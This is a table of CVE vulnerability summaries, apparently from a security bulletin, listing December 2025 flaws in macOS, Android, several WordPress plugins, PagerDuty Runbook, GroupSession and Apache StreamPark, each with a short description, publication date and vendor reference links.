| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43519 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A memory corruption issue was addressed with improved memory handling. This issue is fixed in watchOS 26.1, iOS 18.7.2 and iPadOS 18.7.2, macOS Tahoe 26.1, visionOS 26.1, tvOS 26.1, macOS Sonoma 14.8.2, macOS Sequoia 15.7.2, iOS 26.1 and iPadOS 26.1. A malicious application may be able to cause unexpected system termination or write kernel memory. | 2025-12-12 | not yet calculated | CVE-2025-43520 | https://support.apple.com/en-us/125636 https://support.apple.com/en-us/125637 https://support.apple.com/en-us/125634 https://support.apple.com/en-us/125638 https://support.apple.com/en-us/125639 https://support.apple.com/en-us/125635 https://support.apple.com/en-us/125632 https://support.apple.com/en-us/125633 |
| Apple--macOS | A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43521 | https://support.apple.com/en-us/125887 |
| Apple--macOS | A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to access user-sensitive data. | 2025-12-12 | not yet calculated | CVE-2025-43522 | https://support.apple.com/en-us/125887 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43523 | https://support.apple.com/en-us/125887 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.7.3. An app may be able to gain root privileges. | 2025-12-12 | not yet calculated | CVE-2025-43527 | https://support.apple.com/en-us/125887 |
| Apple--macOS | This issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43530 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A memory corruption issue was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. Processing malicious data may lead to unexpected app termination. | 2025-12-12 | not yet calculated | CVE-2025-43532 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A logging issue was addressed with improved data redaction. This issue is fixed in macOS Sonoma 14.8.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-43538 | https://support.apple.com/en-us/125888 |
| Apple--macOS | The issue was addressed with improved bounds checks. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. Processing a file may lead to memory corruption. | 2025-12-12 | not yet calculated | CVE-2025-43539 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | This issue was addressed with improved state management. This issue is fixed in macOS Sequoia 15.7.3. Password fields may be unintentionally revealed when remotely controlling a device over FaceTime. | 2025-12-12 | not yet calculated | CVE-2025-43542 | https://support.apple.com/en-us/125887 |
| Apple--macOS | An information disclosure issue was addressed with improved privacy controls. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access sensitive user data. | 2025-12-12 | not yet calculated | CVE-2025-46276 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | An integer overflow was addressed by adopting 64-bit timestamps. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to gain root privileges. | 2025-12-12 | not yet calculated | CVE-2025-46285 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | An inconsistent user interface issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An attacker may be able to spoof their FaceTime caller ID. | 2025-12-12 | not yet calculated | CVE-2025-46287 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Apple--macOS | A logic issue was addressed with improved file handling. This issue is fixed in macOS Sonoma 14.8.3, macOS Sequoia 15.7.3. An app may be able to access protected user data. | 2025-12-12 | not yet calculated | CVE-2025-46289 | https://support.apple.com/en-us/125888 https://support.apple.com/en-us/125887 |
| Google--Android | In disassociate of DisassociationProcessor.java, there is a possible way for an app to continue reading notifications when not associated to a companion device due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48525 | https://android.googlesource.com/platform/frameworks/base/+/31989869759e9b6119dc1cf324c395d789024908 https://android.googlesource.com/platform/frameworks/base/+/5ec1cdae1805dec292a2de5554896363eaa078eb https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In grantAllowlistedPackagePermissions of SettingsSliceProvider.java, there is a possible way for a third party app to modify secure settings due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48536 | https://android.googlesource.com/platform/packages/apps/Settings/+/586f8dedd8e0e8a7ca5577cd1f06891f7e84e1e1 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of NotificationStation.java, there is a possible cross-profile information disclosure due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48555 | https://android.googlesource.com/platform/packages/apps/Settings/+/596c7b9911f2004df83b8d2708ad4b50e8d53805 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible intent filter bypass due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48564 | https://android.googlesource.com/platform/frameworks/base/+/28579dff4305f764302d85f95509671eafbf62ac https://android.googlesource.com/platform/packages/modules/IntentResolver/+/4e6cf5285d0b1725fb9141e810050cfdb3fb42fd https://android.googlesource.com/platform/frameworks/base/+/0f3e248787d88154c8592f6e055b6b3586f4877d https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to bypass the cross profile intent filter due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48565 | https://android.googlesource.com/platform/frameworks/base/+/28579dff4305f764302d85f95509671eafbf62ac https://android.googlesource.com/platform/packages/modules/IntentResolver/+/4e6cf5285d0b1725fb9141e810050cfdb3fb42fd https://android.googlesource.com/platform/frameworks/base/+/0f3e248787d88154c8592f6e055b6b3586f4877d https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible bypass of user profile boundary with a forwarded intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48566 | https://android.googlesource.com/platform/frameworks/base/+/28579dff4305f764302d85f95509671eafbf62ac https://android.googlesource.com/platform/frameworks/base/+/0f3e248787d88154c8592f6e055b6b3586f4877d https://android.googlesource.com/platform/packages/modules/IntentResolver/+/4e6cf5285d0b1725fb9141e810050cfdb3fb42fd https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48569 | https://source.android.com/security/bulletin/android-16-qpr2 |
| Google--Android | In multiple locations, there is a possible way to launch activities from the background due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48572 | https://android.googlesource.com/platform/frameworks/base/+/e707f6600330691f9c67dc023c09f4cd2fc59192 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In sendCommand of MediaSessionRecord.java, there is a possible way to launch the foreground service while the app is in the background due to FGS while-in-use abuse. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48573 | https://android.googlesource.com/platform/frameworks/base/+/039030a6b0e7d255af70609a3607e805ad2a99ff https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of CertInstaller.java, there is a possible way to install certificates due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48575 | https://android.googlesource.com/platform/packages/apps/CertInstaller/+/d688ebdbfd404df1e25654bfdf9e790ad9f0db3c https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In updateNotificationChannelGroupFromPrivilegedListener of NotificationManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48576 | https://android.googlesource.com/platform/frameworks/base/+/b812baa1463c9f9e81efa617c9d08ed7a63488b4 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In connectInternal of MediaBrowser.java, there is a possible way to access a while-in-use permission while the app is in the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48580 | https://android.googlesource.com/platform/frameworks/base/+/eb19b27ed8abe9070df9fb85bc9693c8d4ba321b https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of BaseBundle.java, there is a possible way to execute arbitrary code due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48583 | https://android.googlesource.com/platform/frameworks/base/+/02751bc65824a3877bdc21d865cd801b5e9f5e6c https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of NotificationManagerService.java, there is a possible way to bypass the per-package channel limits causing resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48584 | https://android.googlesource.com/platform/frameworks/base/+/08a0766708db2071d9b8b65abf40d7e8057daaa1 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In onActivityResult of EditFdnContactScreen.java, there is a possible way to leak contacts from the work profile due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48586 | https://android.googlesource.com/platform/packages/services/Telephony/+/851fc787e96189a37f88cb9eaa688087883357c3 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In startAlwaysOnVpn of Vpn.java, there is a possible way to disable always-on VPN due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48588 | https://android.googlesource.com/platform/frameworks/base/+/cabbb7da639520633ad318655d1b5fe1c685c78e https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of HeaderPrivacyIconsController.kt, there is a possible way to grant permissions across users due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48589 | https://android.googlesource.com/platform/frameworks/base/+/2aeba76a58c18f66502ecbba4c2e73a8d6e2928c https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In verifyAndGetBypass of AppOpsService.java, there is a possible method for a malicious app to prevent dialing emergency services under limited circumstances due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48590 | https://android.googlesource.com/platform/frameworks/base/+/848f944921756467dba98069ea33531a2f180373 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to read files from another user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48591 | https://android.googlesource.com/platform/frameworks/base/+/3df02a7df8488e04e31ae1d9d081ed1b881dd6ad https://android.googlesource.com/platform/packages/services/Mms/+/43ca1053f0a09b6fd1503caaecb62967a497b554 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In initDecoder of C2SoftDav1dDec.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48592 | https://android.googlesource.com/platform/frameworks/av/+/8febdebcb5e8736ec013a7d64e70f50e87649b52 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In onUidImportance of DisassociationProcessor.java, there is a possible way to retain companion application privileges after disassociation due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48594 | https://android.googlesource.com/platform/frameworks/base/+/ea2bcc66534263fac4c337f1a5149704c2262169 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In appendFrom of Parcel.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48596 | https://android.googlesource.com/platform/frameworks/native/+/6ffdde944d4e0b440b1dfc1f232687299700e039 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to trick a user into accepting a permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48597 | https://android.googlesource.com/platform/frameworks/base/+/68170bad52250399d2e4a1a8023a3e7aeda1887d https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to alter the primary user's face unlock settings due to a confused deputy. This could lead to physical escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48598 | https://android.googlesource.com/platform/packages/apps/Settings/+/83447688f8e3e8f009f1e7d275a14ea00ee7953a https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of WifiScanModeActivity.java, there is a possible way to bypass a device config restriction due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48599 | https://android.googlesource.com/platform/packages/apps/Settings/+/7a792e0b8f68bc4aeb939af703790fd76b51ccbd https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple files, there is a possible way to reveal information across users due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48600 | https://android.googlesource.com/platform/packages/modules/IntentResolver/+/bbe2dc3fb85fac9053b427b6d3c4af3506e0d9b4 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible permanent denial of service due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48601 | https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In InputMethodInfo of InputMethodInfo.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48603 | https://android.googlesource.com/platform/frameworks/base/+/b4c6786312a217ad9dfd97041b2f1e2f77e39b94 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way to read files from another user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48604 | https://android.googlesource.com/platform/packages/services/Mms/+/c60a828b9fa18f67260775a46c752f353fcc0d43 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In preparePackage of InstallPackageHelper.java, there is a possible way for an app to appear hidden upon installation without a mechanism to uninstall it due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48606 | https://source.android.com/security/bulletin/android-16-qpr2 |
| Google--Android | In multiple locations, there is a possible way to create a large amount of app ops due to a logic error in the code. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48607 | https://android.googlesource.com/platform/frameworks/base/+/03d7040699148c961df09dec301d8a1e982ee231 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In isValidMediaUri of SettingsProvider.java, there is a possible cross user media read due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48608 | https://source.android.com/security/bulletin/android-16-qpr2 |
| Google--Android | In __pkvm_guest_relinquish_to_host of mem_protect.c, there is a possible configuration data leak due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48610 | https://android.googlesource.com/kernel/common/+/19fbea31785113700731f4b458d7e20d05777729 https://android.googlesource.com/kernel/common/+/cac44a0bcfc58c85082b13220b4adcac43ccf369 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations, there is a possible way for an application on a work profile to set the main user's default NFC payment setting due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48612 | https://android.googlesource.com/platform/packages/apps/Settings/+/aa744e8988f0e7b77a71087edd4d2546b58d2f24 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In rebootWipeUserData of RecoverySystem.java, there is a possible way to factory reset the device while in DSU mode due to a missing permission check. This could lead to physical denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48614 | https://android.googlesource.com/platform/frameworks/base/+/ec0c32ea736ba3c594352c345358a778334bc773 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In getComponentName of MediaButtonReceiverHolder.java, there is a possible desync in persistence due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48615 | https://android.googlesource.com/platform/frameworks/base/+/a5795fc0cf1f21da88cf05ad06610d3653d1be0e https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In processLaunchBrowser of CommandParamsFactory.java, there is a possible browser interaction from the lockscreen due to improper locking. This could lead to physical escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48618 | https://android.googlesource.com/platform/frameworks/opt/telephony/+/fee68bcdcf029e8f40980616d09367610544bc62 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In onSomePackagesChanged of VoiceInteractionManagerService.java, there is a possible way for a third party application's component name to persist even after uninstalling due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48620 | https://android.googlesource.com/platform/frameworks/base/+/db86972777c84a386d8a6d2d34879923bdbccdf6 https://android.googlesource.com/platform/frameworks/base/+/84dd2b90f4a2ea1ebc5b78f08f14c5a3b92c9c2d https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In DefaultTransitionHandler.java, there is a possible way to enable a tapjacking attack due to an insecure default. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48621 | https://android.googlesource.com/platform/frameworks/native/+/cc34c7b416b964c05a42ae3e9c2929b59b92c64f https://android.googlesource.com/platform/frameworks/base/+/6d1697c96c5cae5062f6aea58cf2665b7d646cb8 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In ProcessArea of dng_misc_opcodes.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48622 | https://android.googlesource.com/platform/external/skia/+/40c3f0a50fb9b47f543be0949f9004e77510f494 https://android.googlesource.com/platform/external/dng_sdk/+/de700ad461e35af50b28b861943a0b0753b10929 https://android.googlesource.com/platform/cts/+/1bcf948f5e555ad7b9b54549698c3e569d7a0af5 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In init_pkvm_hyp_vcpu of pkvm.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48623 | https://android.googlesource.com/kernel/common/+/3b6fab0ff24f7108c71a4d9c12567455cb2a5a81 https://android.googlesource.com/kernel/common/+/e76cff4952af4ac4652dc74ffbd134ff57c47895 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of arm-smmu-v3.c, there is a possible out-of-bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48624 | https://android.googlesource.com/kernel/common/+/0668e45a43398a07c3aa2ae08903097657efd87e https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple locations of UsbDataAdvancedProtectionHook.java, there is a possible way to access USB data when the screen is off due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48625 | https://source.android.com/security/bulletin/android-16-qpr2 |
| Google--Android | In multiple locations, there is a possible way to launch an application from the background due to a precondition check failure. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48626 | https://android.googlesource.com/platform/packages/apps/Launcher3/+/7628af9bf77f1d145359bf4075a6674574cae496 https://android.googlesource.com/platform/frameworks/base/+/9fb37191609f7cb7b2374531cafb2d00ec8b4bec https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible way to launch an activity from the background due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48627 | https://android.googlesource.com/platform/frameworks/base/+/d34ae40f870d4362a069940a035a4d58a536a231 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In validateIconUserBoundary of PrintManagerService.java, there is a possible cross-user image leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48628 | https://android.googlesource.com/platform/frameworks/base/+/9489a5dcd3cdd426d5b39d9caf6bb78142af2399 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In findAvailRecognizer of VoiceInteractionManagerService.java, there is a possible way to become the default speech recognizer app due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48629 | https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In onHeaderDecoded of LocalImageResolver.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48631 | https://android.googlesource.com/platform/frameworks/base/+/d6df825fda3aa29cff7af05357005322152210fd https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In setDisplayName of AssociationRequest.java, there is a possible way to cause CDM associations to persist after the user has disassociated them due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48632 | https://android.googlesource.com/platform/frameworks/base/+/de27b16b1af86d4ce18c9134d85b53331a8d2147 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In hasAccountsOnAnyUser of DevicePolicyManagerService.java, there is a possible way to add a Device Owner after provisioning due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48633 | https://android.googlesource.com/platform/frameworks/base/+/d00bcda9f42dcf272d329e9bf9298f32af732f93 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of mem_protect.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48637 | https://android.googlesource.com/kernel/common/+/4cfc9c2d8815577832cafbfcd7f98025f0da718d https://android.googlesource.com/kernel/common/+/aff2255dbe38dc7c57bac8d3ba9feed989289b20 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In __pkvm_load_tracing of trace.c, there is a possible out-of-bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48638 | https://android.googlesource.com/kernel/common/+/0429b7af308cf65c84109c08d06b01950dcd57fe https://android.googlesource.com/kernel/common/+/96ebe96170d67df5072afa2ce84622f5a0ff552a https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In DefaultTransitionHandler.java, there is a possible way to unknowingly grant permissions to an app due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-48639 | https://android.googlesource.com/platform/frameworks/native/+/cc34c7b416b964c05a42ae3e9c2929b59b92c64f https://android.googlesource.com/platform/frameworks/base/+/6d1697c96c5cae5062f6aea58cf2665b7d646cb8 https://source.android.com/security/bulletin/2025-12-01 |
| Alex Furr--PDF Creator Lite | Cross-Site Request Forgery (CSRF) vulnerability in Alex Furr PDF Creator Lite pdf-creator-lite allows Stored XSS. This issue affects PDF Creator Lite: from n/a through <= 1.2. | 2025-12-09 | not yet calculated | CVE-2025-49341 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-creator-lite/vulnerability/wordpress-pdf-creator-lite-plugin-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Jupitercow--WP sIFR | Cross-Site Request Forgery (CSRF) vulnerability in Jupitercow WP sIFR wp-sifr allows Stored XSS. This issue affects WP sIFR: from n/a through <= 0.6.8.1. | 2025-12-09 | not yet calculated | CVE-2025-49347 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-sifr/vulnerability/wordpress-wp-sifr-plugin-0-6-8-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Hype--Hype | Missing Authorization vulnerability in Hype Hype pico allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hype: from n/a through <= 1.0.5. | 2025-12-09 | not yet calculated | CVE-2025-49348 | https://vdp.patchstack.com/database/Wordpress/Plugin/pico/vulnerability/wordpress-hype-plugin-1-0-5-broken-access-control-vulnerability?_s_id=cve |
| marcoingraiti--Actionwear products sync | Missing Authorization vulnerability in marcoingraiti Actionwear products sync actionwear-products-sync allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Actionwear products sync: from n/a through <= 2.3.3. | 2025-12-09 | not yet calculated | CVE-2025-49350 | https://vdp.patchstack.com/database/Wordpress/Plugin/actionwear-products-sync/vulnerability/wordpress-actionwear-products-sync-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve |
| Valentin Agachi--Create Posts & Terms | Cross-Site Request Forgery (CSRF) vulnerability in Valentin Agachi Create Posts & Terms create-posts-terms allows Stored XSS. This issue affects Create Posts & Terms: from n/a through <= 1.3.1. | 2025-12-09 | not yet calculated | CVE-2025-49351 | https://vdp.patchstack.com/database/Wordpress/Plugin/create-posts-terms/vulnerability/wordpress-create-posts-terms-plugin-1-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| n/a--PagerDuty Runbook | PagerDuty Runbook through 2025-06-12 exposes stored secrets directly in the webpage DOM at the configuration page. Although these secrets appear masked as password fields, the actual secret values are present in the page source and can be revealed by simply modifying the input field type from "password" to "text" using browser developer tools. This vulnerability is exploitable by administrative users who have access to the configuration page. | 2025-12-10 | not yet calculated | CVE-2025-52493 | https://www.praetorian.com https://www.pagerduty.com/security/disclosure/ https://www.pagerduty.com/platform/automation/ https://github.com/carterross2/Vulnerability-Research/tree/main/CVE-2025-52493 |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Stored cross-site scripting vulnerabilities exist in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. A logged-in user can prepare a malicious page or URL, and an arbitrary script may be executed on the web browser when another user accesses it. | 2025-12-12 | not yet calculated | CVE-2025-53523 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Apache Software Foundation--Apache StreamPark | When encrypting sensitive data, weak encryption keys that are fixed or directly generated based on user passwords are used. Attackers can obtain these keys through methods such as reverse engineering, code leaks, or password guessing, thereby decrypting stored or transmitted encrypted data, leading to the leakage of sensitive information. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue. | 2025-12-12 | not yet calculated | CVE-2025-53960 | https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy |
